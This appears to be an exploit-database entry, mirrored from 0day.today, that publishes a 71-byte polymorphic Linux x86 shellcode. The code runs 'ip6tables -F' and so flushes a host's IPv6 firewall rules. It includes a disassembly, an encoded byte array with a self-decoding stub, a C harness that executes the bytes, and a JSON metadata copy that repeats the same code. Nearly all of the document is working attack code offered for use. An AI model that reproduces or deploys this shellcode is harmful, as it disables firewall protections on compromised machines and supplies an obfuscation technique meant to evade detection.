Search...

linux/x86 polymorphic shellcode ip6tables -F - 71 bytes

2010-01-24T00:00:00

ID 1337DAY-ID-10169
Type zdt
Reporter Jonathan Salwan
Modified 2010-01-24T00:00:00

Description

Exploit for linux/x86 platform in category shellcode

                                        
                                            =======================================================
linux/x86 polymorphic shellcode ip6tables -F - 71 bytes
=======================================================


/*  Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes
 *  Jonathan Salwan 
 *
 *
 *  The Gnuser Project (Gnu Users Manager) =&gt; http://www.gnuser.org
 *
 * Disassembly of section .text:
 *
 * 08048054 &lt;.text&gt;:
 * 8048054: 6a 0b                   push   $0xb
 * 8048056: 58                      pop    %eax
 * 8048057: 99                      cltd  
 * 8048058: 52                      push   %edx
 * 8048059: 66 68 2d 46             pushw  $0x462d
 * 804805d: 89 e1                   mov    %esp,%ecx
 * 804805f: 52                      push   %edx
 * 8048060: 6a 73                   push   $0x73
 * 8048062: 66 68 6c 65             pushw  $0x656c
 * 8048066: 68 36 74 61 62          push   $0x62617436
 * 804806b: 68 6e 2f 69 70          push   $0x70692f6e
 * 8048070: 68 2f 73 62 69          push   $0x6962732f
 * 8048075: 68 2f 75 73 72          push   $0x7273752f
 * 804807a: 89 e3                   mov    %esp,%ebx
 * 804807c: 52                      push   %edx
 * 804807d: 51                      push   %ecx
 * 804807e: 53                      push   %ebx
 * 804807f: 89 e1                   mov    %esp,%ecx
 * 8048081: cd 80                   int    $0x80
*/
 
#include &lt;stdio.h&gt;
 
int main(int argc, char *argv[])
{
char shellcode[] =  "\xeb\x11\x5e\x31\xc9\xb1\x47\x80"
            "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
            "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
            "\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
            "\x47\x8a\xe2\x53\x6b\x74\x67\x69"
            "\x6d\x66\x69\x37\x75\x62\x63\x69"
            "\x6f\x30\x6a\x71\x69\x30\x74\x63"
            "\x6a\x69\x30\x76\x74\x73\x8a\xe4"
            "\x53\x52\x54\x8a\xe2\xce\x81";
 
        fprintf(stdout,"Length: %d\n",strlen(shellcode));
    (*(void(*)()) shellcode)();      
}



#  0day.today [2018-01-06]  #

JSON Vulners Source

Initial Source

{"hash": "ddb7946c64ead789a658ff56deb4b6395928b5cd2ee357fd1bb58b1755bcf2d4", "id": "1337DAY-ID-10169", "lastseen": "2018-01-06T05:03:03", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "fa25d682ad8a858d1dd2b72d7aaca6ce", "key": "description"}, {"hash": "7d53f22a2f6915ea24e8585318961447", "key": "href"}, {"hash": "12d6e97db87bdeb61f135d436bbfd6a0", "key": "modified"}, {"hash": "12d6e97db87bdeb61f135d436bbfd6a0", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "76f6e2f1cc9bad8db927b1cafd3e1b21", "key": "reporter"}, {"hash": "806ca1f4628c431eb4589f616b68ce98", "key": "sourceData"}, {"hash": "7cd748f18e12e0cf62fbe06033644a9d", "key": "sourceHref"}, {"hash": "dd05701473954345b45a2fbf9864fc0f", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 5.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/10169", "description": "Exploit for linux/x86 platform in category shellcode", "title": "linux/x86 polymorphic shellcode ip6tables -F - 71 bytes", "history": [{"bulletin": {"hash": "95866b7e046a528b1f86d48a6510374681ce5a867dce8fdc944fbca2221ec38d", "id": "1337DAY-ID-10169", "lastseen": "2016-04-20T02:22:44", "enchantments": {"score": {"value": 4.6, "modified": "2016-04-20T02:22:44"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "43b999db931eb702e36797d4c6ba3fa5", "key": "href"}, {"hash": "dd05701473954345b45a2fbf9864fc0f", "key": "title"}, {"hash": "76f6e2f1cc9bad8db927b1cafd3e1b21", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "12d6e97db87bdeb61f135d436bbfd6a0", "key": "modified"}, {"hash": "12d6e97db87bdeb61f135d436bbfd6a0", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "fa25d682ad8a858d1dd2b72d7aaca6ce", "key": "description"}, {"hash": "f986fd3d4bc29d02e231586e9010a5b0", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "42cd2e2f0d828285022375c8bc5c4c15", "key": "sourceData"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/10169", "description": "Exploit for linux/x86 platform in category shellcode", "viewCount": 0, "title": "linux/x86 polymorphic shellcode ip6tables -F - 71 bytes", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=======================================================\r\nlinux/x86 polymorphic shellcode ip6tables -F - 71 bytes\r\n=======================================================\r\n\r\n\r\n/* Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes\r\n * Jonathan Salwan \r\n *\r\n *\r\n * The Gnuser Project (Gnu Users Manager) => http://www.gnuser.org\r\n *\r\n * Disassembly of section .text:\r\n *\r\n * 08048054 <.text>:\r\n * 8048054: 6a 0b push $0xb\r\n * 8048056: 58 pop %eax\r\n * 8048057: 99 cltd \r\n * 8048058: 52 push %edx\r\n * 8048059: 66 68 2d 46 pushw $0x462d\r\n * 804805d: 89 e1 mov %esp,%ecx\r\n * 804805f: 52 push %edx\r\n * 8048060: 6a 73 push $0x73\r\n * 8048062: 66 68 6c 65 pushw $0x656c\r\n * 8048066: 68 36 74 61 62 push $0x62617436\r\n * 804806b: 68 6e 2f 69 70 push $0x70692f6e\r\n * 8048070: 68 2f 73 62 69 push $0x6962732f\r\n * 8048075: 68 2f 75 73 72 push $0x7273752f\r\n * 804807a: 89 e3 mov %esp,%ebx\r\n * 804807c: 52 push %edx\r\n * 804807d: 51 push %ecx\r\n * 804807e: 53 push %ebx\r\n * 804807f: 89 e1 mov %esp,%ecx\r\n * 8048081: cd 80 int $0x80\r\n*/\r\n \r\n#include <stdio.h>\r\n \r\nint main(int argc, char *argv[])\r\n{\r\nchar shellcode[] = \"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x47\\x80\"\r\n \"\\x6c\\x0e\\xff\\x01\\x80\\xe9\\x01\\x75\"\r\n \"\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\"\r\n \"\\x6b\\x0c\\x59\\x9a\\x53\\x67\\x69\\x2e\"\r\n \"\\x47\\x8a\\xe2\\x53\\x6b\\x74\\x67\\x69\"\r\n \"\\x6d\\x66\\x69\\x37\\x75\\x62\\x63\\x69\"\r\n \"\\x6f\\x30\\x6a\\x71\\x69\\x30\\x74\\x63\"\r\n \"\\x6a\\x69\\x30\\x76\\x74\\x73\\x8a\\xe4\"\r\n \"\\x53\\x52\\x54\\x8a\\xe2\\xce\\x81\";\r\n \r\n fprintf(stdout,\"Length: %d\\n\",strlen(shellcode));\r\n (*(void(*)()) shellcode)(); \r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2010-01-24T00:00:00", "references": [], "reporter": "Jonathan Salwan", "modified": "2010-01-24T00:00:00", "href": "http://0day.today/exploit/description/10169"}, "lastseen": "2016-04-20T02:22:44", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=======================================================\r\nlinux/x86 polymorphic shellcode ip6tables -F - 71 bytes\r\n=======================================================\r\n\r\n\r\n/* Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes\r\n * Jonathan Salwan \r\n *\r\n *\r\n * The Gnuser Project (Gnu Users Manager) => http://www.gnuser.org\r\n *\r\n * Disassembly of section .text:\r\n *\r\n * 08048054 <.text>:\r\n * 8048054: 6a 0b push $0xb\r\n * 8048056: 58 pop %eax\r\n * 8048057: 99 cltd \r\n * 8048058: 52 push %edx\r\n * 8048059: 66 68 2d 46 pushw $0x462d\r\n * 804805d: 89 e1 mov %esp,%ecx\r\n * 804805f: 52 push %edx\r\n * 8048060: 6a 73 push $0x73\r\n * 8048062: 66 68 6c 65 pushw $0x656c\r\n * 8048066: 68 36 74 61 62 push $0x62617436\r\n * 804806b: 68 6e 2f 69 70 push $0x70692f6e\r\n * 8048070: 68 2f 73 62 69 push $0x6962732f\r\n * 8048075: 68 2f 75 73 72 push $0x7273752f\r\n * 804807a: 89 e3 mov %esp,%ebx\r\n * 804807c: 52 push %edx\r\n * 804807d: 51 push %ecx\r\n * 804807e: 53 push %ebx\r\n * 804807f: 89 e1 mov %esp,%ecx\r\n * 8048081: cd 80 int $0x80\r\n*/\r\n \r\n#include <stdio.h>\r\n \r\nint main(int argc, char *argv[])\r\n{\r\nchar shellcode[] = \"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x47\\x80\"\r\n \"\\x6c\\x0e\\xff\\x01\\x80\\xe9\\x01\\x75\"\r\n \"\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\"\r\n \"\\x6b\\x0c\\x59\\x9a\\x53\\x67\\x69\\x2e\"\r\n \"\\x47\\x8a\\xe2\\x53\\x6b\\x74\\x67\\x69\"\r\n \"\\x6d\\x66\\x69\\x37\\x75\\x62\\x63\\x69\"\r\n \"\\x6f\\x30\\x6a\\x71\\x69\\x30\\x74\\x63\"\r\n \"\\x6a\\x69\\x30\\x76\\x74\\x73\\x8a\\xe4\"\r\n \"\\x53\\x52\\x54\\x8a\\xe2\\xce\\x81\";\r\n \r\n fprintf(stdout,\"Length: %d\\n\",strlen(shellcode));\r\n (*(void(*)()) shellcode)(); \r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-06] #", "published": "2010-01-24T00:00:00", "references": [], "reporter": "Jonathan Salwan", "modified": "2010-01-24T00:00:00", "href": "https://0day.today/exploit/description/10169"}